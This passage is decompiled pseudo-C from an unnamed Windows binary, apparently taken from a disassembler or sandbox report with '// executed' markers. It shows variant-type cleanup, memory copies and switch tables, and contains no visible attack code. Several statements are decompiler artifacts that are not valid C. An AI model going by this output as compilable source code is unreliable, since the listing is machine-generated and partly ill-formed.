																				_t1455 =  *((intOrPtr*)(_t1455 + 0x38));
																			}
																			 *((intOrPtr*)(_t1455 + 0x14)) = _v80;
																			__eflags =  *((char*)(_t1012 + 0xd));
																			_t1013 =  *((intOrPtr*)(_t1012 + 8));
																			if( *((char*)(_t1012 + 0xd)) != 0) {
																				_t1013 =  *((intOrPtr*)(_t1013 + 0x38));
																			}
																			 *((char*)(_t1013 + 0x18)) = 0;
																			_t1015 =  *((intOrPtr*)( *_t1396 + 4)) + _t1396;
																			__eflags =  *((char*)(_t1015 + 0xd));
																			_v156 = _t1015;
																			if( *((char*)(_t1015 + 0xd)) != 0) {
																				_t1016 =  *((intOrPtr*)( *((intOrPtr*)(_t1015 + 8)) + 0x38));
																			} else {
																				_t1016 =  *((intOrPtr*)(_t1015 + 8));
																			}
																			_t406 = _t1016 + 0x20; // 0x21
																			_t1397 = _t406;
																			__eflags = _t1397 -  &_v68;
																			if(_t1397 ==  &_v68) {
																				L204:
																				_t1735 = _v124;
																				goto L205;
																			} else {
																				_t1109 =  *(_t1397 + 0xc);
																				__eflags = _t1109;
																				if(_t1109 != 0) {
																					E00FD651E(_t1109);
																					 *(_t1397 + 0xc) = 0;
																				}
																				_t1111 =  *((intOrPtr*)(_t1397 + 8));
																				__eflags = _t1111 - 8;
																				if(_t1111 == 8) {
																					_t1474 =  *_t1397;
																					__eflags = _t1474;
																					if(_t1474 == 0) {
																						goto L197;
																					}
																					__imp__#9(_t1474);
																					_push( *_t1397);
																					E00FA10FC();
																					_t1809 = _t1809 + 4;
																					goto L201;
																				} else {
																					L197:
																					__eflags = _t1111 - 0xa;
																					if(_t1111 == 0xa) {
																						_t1112 =  *_t1397;
																						__eflags = _t1112;
																						if(_t1112 != 0) {
																							E00FD30B0(_t1112);
																						}
																					} else {
																						__eflags = _t1111 - 5;
																						if(_t1111 == 5) {
																							E00F9E470(_t1397, _t1771);
																						} else {
																							__eflags = _t1111 - 0xb;
																							if(_t1111 == 0xb) {
																								_push( *((intOrPtr*)( *_t1397 + 4)));
																								E00FA10FC();
																								_push( *_t1397);
																								E00FA10FC();
																								_t1809 = _t1809 + 8;
																							} else {
																								__eflags = _t1111 - 0xc;
																								if(_t1111 == 0xc) {
																									_t1123 =  *_t1397;
																									__eflags = _t1123;
																									if(_t1123 != 0) {
																										E00FDB350(_t1123);
																									}
																								}
																							}
																						}
																					}
																					L201:
																					_t1113 = _v60;
																					 *_t1397 = 0;
																					 *((intOrPtr*)(_t1397 + 8)) = _t1113;
																					__eflags = _t1113 - 1;
																					if(_t1113 != 1) {
																						_t1114 = _t1113 - 1;
																						__eflags = _t1114 - 0xb;
																						if(__eflags > 0) {
																							goto L204;
																						}
																						switch( *((intOrPtr*)(_t1114 * 4 +  &M00FBAE92))) {
																							case 0:
																								goto L202;
																							case 1:
																								 *_t1397 = _v68;
																								 *((intOrPtr*)(_t1397 + 4)) = _v64;
																								goto L204;
																							case 2:
																								__fp0 = _v68;
																								 *__ebx = _v68;
																								goto L204;
																							case 3:
																								_push(0x10);
																								__eax = E00FA14F7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									__eax = 0;
																									__ebx[3] = 0;
																								} else {
																									__ecx = _v56;
																									__edx =  *__ecx;
																									 *__eax =  *__ecx;
																									__edx =  *(__ecx + 4);
																									 *(__eax + 4) =  *(__ecx + 4);
																									__edx =  *(__ecx + 8);
																									 *(__eax + 8) =  *(__ecx + 8);
																									__ecx =  *(__ecx + 0xc);
																									 *(__eax + 0xc) = __ecx;
																									 *__ecx =  *__ecx + 1;
																									__ebx[3] = __eax;
																								}
																								goto L204;
																							case 4:
																								_push(0x214);
																								__eax = E00FA14F7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									__eax = 0;
																									__eflags = 0;
																								} else {
																									__esi = _v68;
																									__ecx = 0x85;
																									__edi = __eax;
																									__eax = memcpy(__eax, __esi, 0x85 << 2);
																									__esi + __ecx = __esi + __ecx + __ecx;
																									__ecx = 0;
																								}
																								__edi = _v124;
																								 *__ebx = __eax;
																								__eflags =  *(__eax + 4);
																								if( *(__eax + 4) != 0) {
																									__eax =  *(__eax + 4);
																									 *__eax =  *__eax + 1;
																								}
																								L205:
																								_t1018 = _v156;
																								__eflags =  *((char*)(_t1018 + 0xd));
																								if( *((char*)(_t1018 + 0xd)) != 0) {
																									_t1019 =  *((intOrPtr*)( *((intOrPtr*)(_t1018 + 8)) + 0x38));
																								} else {
																									_t1019 =  *((intOrPtr*)(_t1018 + 8));
																								}
																								 *((char*)(_t1019 + 0x30)) = 0;
																								__eflags =  *0x1037f3d;
																								if( *0x1037f3d != 0) {
																									_t1020 =  *0x1037f38; // 0x0
																									_t1771 =  *(_t1020 + 8);
																									E00FFFE4A(_t1397, _t1735, _t1020);
																									_t1458 =  *(_t1020 + 8);
																									 *0x1037f38 = _t1458;
																									 *0x1037f3d = 0;
																								} else {
																									_t1458 =  *0x1037f38; // 0x0
																								}
																								__eflags =  *0x1037f3c;
																								if( *0x1037f3c != 0) {
																									_t1398 = _v128;
																									 *0x1037f3d = 1;
																									goto L229;
																								} else {
																									_t1771 =  *_t1458;
																									_v160 = _t1458[2];
																									_v156 = _t1458;
																									__eflags = _t1771;
																									if(_t1771 == 0) {
																										L228:
																										_t1398 = _v128;
																										_push(_v156);
																										E00FA10FC();
																										_t1809 = _t1809 + 4;
																										 *0x1037f38 = _v160;
																										 *0x1037f3d = 0;
																										L229:
																										 *0x1037f34 =  *0x1037f34 - 1;
																										 *((intOrPtr*)(_a4 + 0x148)) = _v8;
																										_t1023 = _v56;
																										__eflags = _t1023;
																										if(_t1023 != 0) {
																											E00FD651E(_t1023);
																											_v60 = 0;
																										}
																										_t1025 = _v60;
																										__eflags = _t1025 - 8;
																										if(_t1025 == 8) {
																											_t1772 = _v68;
																											__eflags = _t1772;
																											if(_t1772 != 0) {
																												_push(_t1772);
																												__imp__#9();
																												_push(_t1772);
																												E00FA10FC();
																												_t1809 = _t1809 + 4;
																											}
																										} else {
																											__eflags = _t1025 - 0xa;
																											if(_t1025 == 0xa) {
																												_t1073 = _v68;
																												__eflags = _t1073;
																												if(_t1073 != 0) {
																													E00FD30B0(_t1073);
																												}
																											} else {
																												__eflags = _t1025 - 5;
																												if(_t1025 == 5) {
																													E00F9E470( &_v68, _t1771);
																												} else {
																													__eflags = _t1025 - 0xb;
																													if(_t1025 == 0xb) {
																														_t1776 = _v68;
																														_push( *((intOrPtr*)(_t1776 + 4)));
																														E00FA10FC();
																														_push(_t1776);
																														E00FA10FC();
																														_t1809 = _t1809 + 8;
																													} else {
																														__eflags = _t1025 - 0xc;
																														if(_t1025 == 0xc) {
																															_t1079 = _v68;
																															__eflags = _t1079;
																															if(_t1079 != 0) {
																																E00FDB350(_t1079);
																															}
																														}
																													}
																												}
																											}
																										}
																										_t1026 = _v88;
																										_t1773 = _v92;
																										_t1460 = 0;
																										_v60 = 1;
																										_v68 = 0;
																										__eflags = _t1026;
																										if(_t1026 != 0) {
																											E00FD651E(_t1026);
																											_v92 = 0;
																											_t1623 = 1;
																											_t1460 = 0;
																										}
																										__eflags = _t1773 - 8;
																										if(_t1773 == 8) {
																											__eflags = _v100 - _t1460;
																											if(_v100 != _t1460) {
																												_t1773 = _v100;
																												_push(_t1773);
																												__imp__#9();
																												_push(_t1773);
																												E00FA10FC();
																												_t1809 = _t1809 + 4;
																												_t1623 = 1;
																												_t1460 = 0;
																											}
																										} else {
																											__eflags = _t1773 - 0xa;
																											if(_t1773 == 0xa) {
																												__eflags = _v100 - _t1460;
																												if(_v100 != _t1460) {
																													E00FD30B0(_v100);
																													_t1623 = 1;
																													_t1460 = 0;
																												}
																											} else {
																												__eflags = _t1773 - 5;
																												if(_t1773 == 5) {
																													E00F9E470( &_v100, _t1773);
																													_t1623 = 1;
																													_t1460 = 0;
																												} else {
																													__eflags = _t1773 - 0xb;
																													if(_t1773 == 0xb) {
																														_t1773 = _v100;
																														_push( *((intOrPtr*)(_t1773 + 4)));
																														E00FA10FC();
																														_push(_t1773);
																														E00FA10FC();
																														_t1809 = _t1809 + 8;
																														_t1623 = 1;
																														_t1460 = 0;
																													} else {
																														__eflags = _t1773 - 0xc;
																														if(_t1773 == 0xc) {
																															__eflags = _v100 - _t1460;
																															if(_v100 != _t1460) {
																																E00FDB350(_v100);
																																_t1623 = 1;
																																_t1460 = 0;
																															}
																														}
																													}
																												}
																											}
																										}
																										_t1028 = _v184;
																										__eflags = _t1028 - _t1460;
																										if(_t1028 != _t1460) {
																											E00FD651E(_t1028);
																											_v188 = 0;
																											_t1623 = 1;
																											_t1460 = 0;
																										}
																										_t1030 = _v188;
																										__eflags = _t1030 - 8;
																										if(_t1030 == 8) {
																											_t1031 = _v196;
																											__eflags = _t1031 - _t1460;
																											if(_t1031 != _t1460) {
																												_push(_t1031);
																												__imp__#9();
																												_push(_v200);
																												E00FA10FC();
																												_t1809 = _t1809 + 4;
																												_t1623 = 1;
																												_t1460 = 0;
																											}
																										} else {
																											__eflags = _t1030 - 0xa;
																											if(_t1030 == 0xa) {
																												_t1055 = _v196;
																												__eflags = _t1055 - _t1460;
																												if(_t1055 != _t1460) {
																													E00FD30B0(_t1055);
																													_t1623 = 1;
																													_t1460 = 0;
																												}
																											} else {
																												__eflags = _t1030 - 5;
																												if(_t1030 == 5) {
																													E00F9E470( &_v196, _t1773);
																													_t1623 = 1;
																													_t1460 = 0;
																												} else {
																													__eflags = _t1030 - 0xb;
																													if(_t1030 == 0xb) {
																														_push( *(_v196 + 4));
																														E00FA10FC();
																														_push(_v196);
																														E00FA10FC();
																														_t1809 = _t1809 + 8;
																														_t1623 = 1;
																														_t1460 = 0;
																													} else {
																														__eflags = _t1030 - 0xc;
																														if(_t1030 == 0xc) {
																															_t1062 = _v196;
																															__eflags = _t1062 - _t1460;
																															if(_t1062 != _t1460) {
																																E00FDB350(_t1062);
																																_t1623 = 1;
																																_t1460 = 0;
																															}
																														}
																													}
																												}
																											}
																										}
																										_v188 = _t1623;
																										_v196 = _t1460;
																										__eflags = _t1735 - _t1460;
																										if(_t1735 <= _t1460) {
																											L250:
																											_push(_v128);
																											E00FA10FC();
																											_t1811 = _t1809 + 4;
																											__eflags = _v172;
																											if(_v172 <= 0) {
																												L263:
																												_push(_v176);
																												E00FA10FC();
																												_t946 = 0;
																												__eflags = 0;
																												goto L264;
																											} else {
																												_t1399 = 0;
																												__eflags = 0;
																												do {
																													_t1774 =  *(_v176 + _t1399 * 4);
																													__eflags = _t1774;
																													if(_t1774 == 0) {
																														goto L262;
																													}
																													_t1736 =  *(_t1774 + 0xc);
																													__eflags = _t1736;
																													if(_t1736 != 0) {
																														 *( *(_t1736 + 0xc)) =  *( *(_t1736 + 0xc)) - 1;
																														__eflags =  *( *(_t1736 + 0xc));
																														if( *( *(_t1736 + 0xc)) == 0) {
																															_push( *_t1736);
																															E00FA10FC();
																															_push( *(_t1736 + 0xc));
																															E00FA10FC();
																															_t1811 = _t1811 + 8;
																														}
																														_push(_t1736);
																														E00FA10FC();
																														_t1811 = _t1811 + 4;
																														 *(_t1774 + 0xc) = 0;
																													}
																													_t1035 =  *(_t1774 + 8);
																													__eflags = _t1035 - 8;
																													if(_t1035 == 8) {
																														_t1461 =  *_t1774;
																														__eflags = _t1461;
																														if(_t1461 == 0) {
																															goto L257;
																														}
																														_push(_t1461);
																														__imp__#9();
																														_push( *_t1774);
																														E00FA10FC();
																														_t1811 = _t1811 + 4;
																														goto L261;
																													} else {
																														L257:
																														__eflags = _t1035 - 0xa;
																														if(_t1035 == 0xa) {
																															_t1036 =  *_t1774;
																															__eflags = _t1036;
																															if(_t1036 != 0) {
																																E00FD30B0(_t1036);
																															}
																														} else {
																															__eflags = _t1035 - 5;
																															if(_t1035 == 5) {
																																E00F9E470(_t1774, _t1774);
																															} else {
																																__eflags = _t1035 - 0xb;
																																if(_t1035 == 0xb) {
																																	_push( *((intOrPtr*)( *_t1774 + 4))); // executed
																																	E00FA10FC(); // executed
																																	_push( *_t1774);
																																	E00FA10FC();
																																	_t1811 = _t1811 + 8;
																																} else {
																																	__eflags = _t1035 - 0xc;
																																	if(_t1035 == 0xc) {
																																		_t1044 =  *_t1774;
																																		__eflags = _t1044;
																																		if(_t1044 != 0) {
																																			E00FDB350(_t1044);
																																		}
																																	}
																																}
																															}
																														}
																														L261:
																														_push(_t1774);
																														 *(_t1774 + 8) = 1;
																														 *_t1774 = 0;
																														E00FA10FC();
																														_t1811 = _t1811 + 4;
																													}
																													L262:
																													_t1399 = _t1399 + 1;
																													__eflags = _t1399 - _v172;
																												} while (_t1399 < _v172);
																												goto L263;
																											}
																										} else {
																											_t1775 = 0;
																											__eflags = 0;
																											do {
																												_push( *((intOrPtr*)(_t1398 + _t1775 * 4)));
																												E00FA10FC();
																												_t1775 = _t1775 + 1;
																												_t1809 = _t1809 + 4;
																												__eflags = _t1775 - _t1735;
																											} while (_t1775 < _t1735);
																											goto L250;
																										}
																									} else {
																										_t1082 =  *(_t1771 + 0x18);
																										_t1400 = _t1458;
																										__eflags = _t1082;
																										if(_t1082 != 0) {
																											E00F9B650(_t1400, _t1458, _t1735, _t1082); // executed
																										}
																										_t1083 =  *(_t1771 + 0x1c);
																										__eflags = _t1083;
																										if(_t1083 != 0) {
																											E00F9B650(_t1400, _t1400, _t1735, _t1083); // executed
																										}
																										__eflags =  *((char*)(_t1771 + 0x10));
																										if( *((char*)(_t1771 + 0x10)) != 0) {
																											L225:
																											 *( *(_t1771 + 0xc)) =  *( *(_t1771 + 0xc)) - 1;
																											__eflags =  *( *(_t1771 + 0xc));
																											if( *( *(_t1771 + 0xc)) == 0) {
																												_push( *_t1771);
																												E00FA10FC();
																												_push( *(_t1771 + 0xc));
																												E00FA10FC();
																												_t1809 = _t1809 + 8;
																											}
																											_push(_t1771); // executed
																											E00FA10FC(); // executed
																											_t1735 = _v124;
																											_t1809 = _t1809 + 4;
																											goto L228;
																										} else {
																											_t1401 =  *(_t1771 + 0x14);
																											__eflags = _t1401;
																											if(_t1401 == 0) {
																												goto L225;
																											}
																											_t1737 =  *(_t1401 + 0xc);
																											__eflags = _t1737;
																											if(_t1737 != 0) {
																												 *( *(_t1737 + 0xc)) =  *( *(_t1737 + 0xc)) - 1;
																												__eflags =  *( *(_t1737 + 0xc));
																												if( *( *(_t1737 + 0xc)) == 0) {
																													_push( *_t1737);
																													E00FA10FC();
																													_push( *(_t1737 + 0xc));
																													E00FA10FC();
																													_t1809 = _t1809 + 8;
																												}
																												_push(_t1737);
																												E00FA10FC();
																												_t1809 = _t1809 + 4;
																												 *(_t1401 + 0xc) = 0;
																											}
																											_t1090 =  *(_t1401 + 8);
																											__eflags = _t1090 - 8;
																											if(_t1090 == 8) {
																												_t1471 =  *_t1401;
																												__eflags = _t1471;
																												if(_t1471 == 0) {
																													goto L220;
																												}
																												_push(_t1471);
																												__imp__#9();
																												_push( *_t1401);
																												E00FA10FC();
																												_t1809 = _t1809 + 4;
																												goto L224;
																											} else {
																												L220:
																												__eflags = _t1090 - 0xa;
																												if(_t1090 == 0xa) {
																													_t1091 =  *_t1401;
																													__eflags = _t1091;
																													if(_t1091 != 0) {
																														E00FD30B0(_t1091);
																													}
																												} else {
																													__eflags = _t1090 - 5;
																													if(_t1090 == 5) {
																														E00F9E470(_t1401, _t1771);
																													} else {
																														__eflags = _t1090 - 0xb;
																														if(_t1090 == 0xb) {
																															_push( *((intOrPtr*)( *_t1401 + 4))); // executed
																															E00FA10FC(); // executed
																															_push( *_t1401);
																															E00FA10FC();
																															_t1809 = _t1809 + 8;
																														} else {
																															__eflags = _t1090 - 0xc;
																															if(_t1090 == 0xc) {
																																_t1099 =  *_t1401;
																																__eflags = _t1099;
																																if(_t1099 != 0) {
																																	E00FDB350(_t1099); // executed
																																}
																															}
																														}
																													}
																												}
																												L224:
																												_push(_t1401);
																												 *(_t1401 + 8) = 1;
																												 *_t1401 = 0;
																												E00FA10FC();
																												_t1809 = _t1809 + 4;
																												goto L225;
																											}
																										}
																									}
																								}
																							case 5:
																								__ecx = _v68;
																								 *__ebx = __ecx;
																								goto L204;
																							case 6:
																								__esi = _v68;
																								__eflags = __esi;
																								if(__eflags != 0) {
																									_push(0x10);
																									__eax = E00FA14F7(__edi, __esi, __eflags);
																									__esp = __esp + 4;
																									_push(__eax);
																									 *__ebx = __eax;
																									__imp__#8();
																									__edx =  *__ebx;
																									_push(__esi);
																									_push( *__ebx);
																									__imp__#10();
																									__eflags = __eax;
																									if(__eax < 0) {
																										__eax =  *__ebx;
																										_push( *__ebx);
																										__imp__#9();
																										__ecx =  *__ebx;
																										_push( *__ebx);
																										__eax = E00FA10FC();
																										__esp = __esp + 4;
																										 *__ebx = 0;
																									}
																								}
																								goto L204;
																							case 7:
																								 *__ebx = _v68;
																								goto L204;
																							case 8:
																								_push(0x18);
																								__eax = E00FA14F7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									goto L567;
																								}
																								__ecx = _v68;
																								__eax = E00FDB82F(__eax, _v68);
																								goto L203;
																							case 9:
																								_push(8);
																								__eax = E00FA14F7(__edi, __esi, __eflags);
																								__esi = _v68;
																								 *__ebx = __eax;
																								__edx =  *__esi;
																								 *__eax =  *__esi;
																								__eax =  *__ebx;
																								__eax =  *( *__ebx);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eflags == 0) {
																									_push(1);
																									__eax = E00FA14F7(__edi, __esi, __eflags);
																									__edx =  *__ebx;
																									 *( *__ebx + 4) = __eax;
																									__eax =  *__ebx;
																									__ecx =  *(__eax + 4);
																									__esp = __esp + 4;
																									 *__ecx = 0;
																								} else {
																									_push(__eax);
																									__eax = E00FA14F7(__edi, __esi, __eflags);
																									__ecx =  *__ebx;
																									 *( *__ebx + 4) = __eax;
																									__ebx =  *__ebx;
																									__edx =  *__ebx;
																									__eax =  *(__esi + 4);
																									__ecx = __ebx[1];
																									__esp = __esp + 4;
																									__eax = E00FA0D80(__ebx[1],  *(__esi + 4),  *__ebx);
																								}
																								goto L204;
																							case 0xa:
																								_push(0x14);
																								__eax = E00FA14F7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									L567:
																									__eax = 0;
																									L203:
																									 *_t1397 = _t1116;
																									goto L204;
																								}
																								__edx = _v68;
																								__eax = E0100082A(__eax, _v68);
																								goto L203;
																						}
																					}
																					L202:
																					_t1116 = _v68;
																					goto L203;
																				}
																			}
																		}
																		_t1126 =  *(_t1771 + 0x2c);
																		__eflags = _t1126;
																		if(_t1126 != 0) {
																			E00FD651E(_t1126);
																			 *(_t1771 + 0x2c) = 0;
																		}
																		_t1128 =  *(_t1771 + 0x28);
																		__eflags = _t1128 - 8;
																		if(_t1128 == 8) {
																			_t1477 =  *(_t1771 + 0x20);
																			__eflags = _t1477;
																			if(_t1477 == 0) {
																				goto L176;
																			}
																			__imp__#9(_t1477);
																			_push( *(_t1771 + 0x20));
																			E00FA10FC();
																			_t1809 = _t1809 + 4;
																			goto L180;
																		} else {
																			L176:
																			__eflags = _t1128 - 0xa;
																			if(_t1128 == 0xa) {
																				_t1129 =  *(_t1771 + 0x20);
																				__eflags = _t1129;
																				if(_t1129 != 0) {
																					E00FD30B0(_t1129);
																				}
																			} else {
																				__eflags = _t1128 - 5;
																				if(_t1128 == 5) {
																					_t851 = _t1771 + 0x20; // 0x67
																					E00F9E470(_t851, _t1771);
																				} else {
																					__eflags = _t1128 - 0xb;
																					if(_t1128 == 0xb) {
																						_push( *((intOrPtr*)( *(_t1771 + 0x20) + 4)));
																						E00FA10FC();
																						_push( *(_t1771 + 0x20));
																						E00FA10FC();
																						_t1809 = _t1809 + 8;
																					} else {
																						__eflags = _t1128 - 0xc;
																						if(_t1128 == 0xc) {
																							_t1153 =  *(_t1771 + 0x20);
																							__eflags = _t1153;
																							if(_t1153 != 0) {
																								E00FDB350(_t1153);
																							}
																						}
																					}
																				}
																			}
																			L180:
																			 *(_t1771 + 0x28) = 1;
																			 *(_t1771 + 0x20) = 0;
																			_t1402 =  *(_t1771 + 0xc);
																			__eflags = _t1402;
																			if(_t1402 != 0) {
																				 *( *(_t1402 + 0xc)) =  *( *(_t1402 + 0xc)) - 1;
																				__eflags =  *( *(_t1402 + 0xc));
																				if( *( *(_t1402 + 0xc)) == 0) {
																					_push( *_t1402);
																					E00FA10FC();
																					_push( *(_t1402 + 0xc));
																					E00FA10FC();
																					_t1809 = _t1809 + 8;
																				}
																				_push(_t1402);
																				E00FA10FC();
																				_t1809 = _t1809 + 4;
																				 *(_t1771 + 0xc) = 0;
																			}
																			_t1130 =  *(_t1771 + 8);
																			__eflags = _t1130 - 8;
																			if(_t1130 == 8) {
																				_t1478 =  *_t1771;
																				__eflags = _t1478;
																				if(_t1478 == 0) {
																					goto L184;
																				}
																				__imp__#9(_t1478);
																				_push( *_t1771);
																				E00FA10FC();
																				_t1809 = _t1809 + 4;
																				goto L188;
																			} else {
																				L184:
																				__eflags = _t1130 - 0xa;
																				if(_t1130 == 0xa) {
																					_t1131 =  *_t1771;
																					__eflags = _t1131;
																					if(_t1131 != 0) {
																						E00FD30B0(_t1131);
																					}
																				} else {
																					__eflags = _t1130 - 5;
																					if(_t1130 == 5) {
																						E00F9E470(_t1771, _t1771);
																					} else {
																						__eflags = _t1130 - 0xb;
																						if(_t1130 == 0xb) {
																							_push( *((intOrPtr*)( *_t1771 + 4)));
																							E00FA10FC();
																							_push( *_t1771);
																							E00FA10FC();
																							_t1809 = _t1809 + 8;
																						} else {
																							__eflags = _t1130 - 0xc;
																							if(_t1130 == 0xc) {
																								_t1139 =  *_t1771;
																								__eflags = _t1139;
																								if(_t1139 != 0) {
																									E00FDB350(_t1139);
																								}
																							}
																						}
																					}
																				}
																				L188:
																				_push(_t1771);
																				 *(_t1771 + 8) = 1;
																				 *_t1771 = 0;
																				E00FA10FC();
																				_t1396 = _a4;
																				_t1809 = _t1809 + 4;
																				goto L189;
																			}
																		}
																	}
																} else {
																	_t1160 =  *(_t1403 + 0xc);
																	__eflags = _t1160;
																	if(_t1160 != 0) {
																		E00FD651E(_t1160);
																		 *(_t1403 + 0xc) = 0;
																	}
																	_t1162 =  *(_t1403 + 8);
																	__eflags = _t1162 - 8;
																	if(_t1162 == 8) {
																		_t1485 =  *_t1403;
																		__eflags = _t1485;
																		if(_t1485 == 0) {
																			goto L158;
																		}
																		__imp__#9(_t1485);
																		_push( *_t1403);
																		E00FA10FC();
																		_t1809 = _t1809 + 4;
																		goto L162;
																	} else {
																		L158:
																		__eflags = _t1162 - 0xa;
																		if(_t1162 == 0xa) {
																			_t1163 =  *_t1403;
																			__eflags = _t1163;
																			if(_t1163 != 0) {
																				E00FD30B0(_t1163);
																			}
																		} else {
																			__eflags = _t1162 - 5;
																			if(_t1162 == 5) {
																				E00F9E470(_t1403, _t1777);
																			} else {
																				__eflags = _t1162 - 0xb;
																				if(_t1162 == 0xb) {
																					_push( *((intOrPtr*)( *_t1403 + 4)));
																					E00FA10FC();
																					_push( *_t1403);
																					E00FA10FC();
																					_t1809 = _t1809 + 8;
																				} else {
																					__eflags = _t1162 - 0xc;
																					if(_t1162 == 0xc) {
																						_t1173 =  *_t1403;
																						__eflags = _t1173;
																						if(_t1173 != 0) {
																							E00FDB350(_t1173);
																						}
																					}
																				}
																			}
																		}
																		L162:
																		 *(_t1403 + 8) = 1;
																		 *_t1403 = 0;
																		_t1164 =  *(_t1777 + 8);
																		 *(_t1403 + 8) = _t1164;
																		__eflags = _t1164 - 4;
																		if(__eflags != 0) {
																			_t1165 = _t1164 - 1;
																			__eflags = _t1165 - 0xb;
																			if(__eflags > 0) {
																				goto L166;
																			}
																			switch( *((intOrPtr*)(_t1165 * 4 +  &M00FBAE62))) {
																				case 0:
																					__eax =  *__esi;
																					 *__ebx = __eax;
																					goto L166;
																				case 1:
																					 *_t1403 =  *_t1777;
																					 *((intOrPtr*)(_t1403 + 4)) =  *((intOrPtr*)(_t1777 + 4));
																					goto L166;
																				case 2:
																					__fp0 =  *__esi;
																					 *__ebx =  *__esi;
																					goto L166;
																				case 3:
																					goto L163;
																				case 4:
																					_push(0x214);
																					__eax = E00FA14F7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eax == 0) {
																						__eax = 0;
																						__eflags = 0;
																					} else {
																						__esi =  *__esi;
																						__ecx = 0x85;
																						__edi = __eax;
																						__eax = memcpy(__eax, __esi, 0x85 << 2);
																						__esi + __ecx = __esi + __ecx + __ecx;
																						__ecx = 0;
																					}
																					 *__ebx = __eax;
																					__eflags =  *(__eax + 4);
																					if( *(__eax + 4) != 0) {
																						__eax =  *(__eax + 4);
																						 *__eax =  *__eax + 1;
																						__eflags =  *__eax;
																					}
																					goto L495;
																				case 5:
																					__ecx =  *__esi;
																					 *__ebx = __ecx;
																					goto L166;
																				case 6:
																					__eflags =  *__esi;
																					if(__eflags == 0) {
																						L495:
																						__edi = _a4;
																						goto L166;
																					}
																					_push(0x10);
																					__eax = E00FA14F7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					_push(__eax);
																					 *__ebx = __eax;
																					__imp__#8();
																					__edx =  *__esi;
																					__eax =  *__ebx;
																					_push( *__esi);
																					_push(__eax);
																					__imp__#10();
																					__eflags = __eax;
																					if(__eax < 0) {
																						__ecx =  *__ebx;
																						_push( *__ebx);
																						__imp__#9();
																						__edx =  *__ebx;
																						_push( *__ebx);
																						__eax = E00FA10FC();
																						__esp = __esp + 4;
																						 *__ebx = 0;
																					}
																					goto L166;
																				case 7:
																					 *__ebx =  *__esi;
																					goto L166;
																				case 8:
																					_push(0x18);
																					__eax = E00FA14F7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eax == 0) {
																						goto L502;
																					}
																					__ecx =  *__esi;
																					__eax = E00FDB82F(__eax,  *__esi);
																					 *__ebx = __eax;
																					goto L166;
																				case 9:
																					_push(8);
																					__eax = E00FA14F7(__edi, __esi, __eflags);
																					 *__ebx = __eax;
																					__edx =  *__esi;
																					__ecx =  *( *__esi);
																					 *__eax =  *( *__esi);
																					__edx =  *__ebx;
																					__eax =  *( *__ebx);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eflags == 0) {
																						_push(1);
																						__eax = E00FA14F7(__edi, __esi, __eflags);
																						__ecx =  *__ebx;
																						 *(__ecx + 4) = __eax;
																						__edx =  *__ebx;
																						__eax =  *( *__ebx + 4);
																						__esp = __esp + 4;
																						 *__eax = 0;
																					} else {
																						_push(__eax);
																						__eax = E00FA14F7(__edi, __esi, __eflags);
																						__ecx =  *__ebx;
																						 *( *__ebx + 4) = __eax;
																						__ebx =  *__ebx;
																						__edx =  *__ebx;
																						__eax =  *__esi;
																						__ecx =  *( *__esi + 4);
																						__esp = __esp + 4;
																						__edx = __ebx[1];
																						__eax = E00FA0D80(__ebx[1],  *( *__esi + 4),  *__ebx);
																					}
																					goto L166;
																				case 0xa:
																					_push(0x14);
																					__eax = E00FA14F7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eax == 0) {
																						L502:
																						__eax = 0;
																						 *__ebx = 0;
																						goto L166;
																					}
																					__ecx =  *__esi;
																					__eax = E0100082A(__eax,  *__esi);
																					 *__ebx = __eax;
																					goto L166;
																			}
																		}
																		L163:
																		_push(0x10);
																		_t1166 = E00FA14F7(_t1733, _t1777, __eflags);
																		_t1809 = _t1809 + 4;
																		__eflags = _t1166;
																		if(_t1166 == 0) {
																			_t1166 = 0;
																		} else {
																			_t1487 =  *(_t1777 + 0xc);
																			 *_t1166 =  *_t1487;
																			 *((intOrPtr*)(_t1166 + 4)) =  *((intOrPtr*)(_t1487 + 4));
																			 *((intOrPtr*)(_t1166 + 8)) =  *((intOrPtr*)(_t1487 + 8));
																			_t1488 =  *(_t1487 + 0xc);
																			 *(_t1166 + 0xc) = _t1488;
																			 *_t1488 =  *_t1488 + 1;
																			__eflags =  *_t1488;
																		}
																		 *(_t1403 + 0xc) = _t1166;
																		goto L166;
																	}
																}
															}
														}
													} else {
														_v108 = 1;
														goto L70;
														L71:
														__eflags = _v108 - _v116;
														if(_v108 > _v116) {
															E00F9D740( &_v40, _t1493);
															_v104 = 0;
															_t1179 =  *((intOrPtr*)( *(_v148 + 4) + 8 + _t1778 * 4));
															_t1495 =  *( *((intOrPtr*)( *(_v148 + 4) + 8 + _t1778 * 4)) + 8) & 0x0000ffff;
															__eflags = _t1495 - 0x4a;
															if(_t1495 == 0x4a) {
																L381:
																E00F929B0(_t1179, _t1495,  &_v40);
																_t1495 =  *(_v148 + 4);
																_t1179 =  *((intOrPtr*)( *(_v148 + 4) + 0xc + _v212 * 4));
																L382:
																E00F929B0(_t1179, _t1495,  &_v40);
																E00F92940(0x7f,  &_v20, _t1851);
																E00F929B0( &_v20, _t1495,  &_v40);
																E00F9A9D0(_a4, _t1851,  &_v40,  &_v104,  &_v196, 0xffffffff);
																_v172 = _v228 + _v228 + _v228 + _v228;
																E00F91BE0(1, _v224 | 0x00000200,  &_v212,  *((intOrPtr*)( *((intOrPtr*)(_v228 + _v228 + _v228 + _v228 +  *((intOrPtr*)(_v164 + 4)))))));
																L140:
																_t1193 =  *(_v148 + 4);
																_t1611 =  *(_v156 + _t1193 + 4);
																__eflags =  *(_t1611 + 8) - 0x41;
																if( *(_t1611 + 8) == 0x41) {
																	_t1611 =  *(_t1193 + 8 + _v212 * 4);
																	_t1194 =  *(_t1611 + 8) & 0x0000ffff;
																	__eflags = _t1194 - 0x4a;
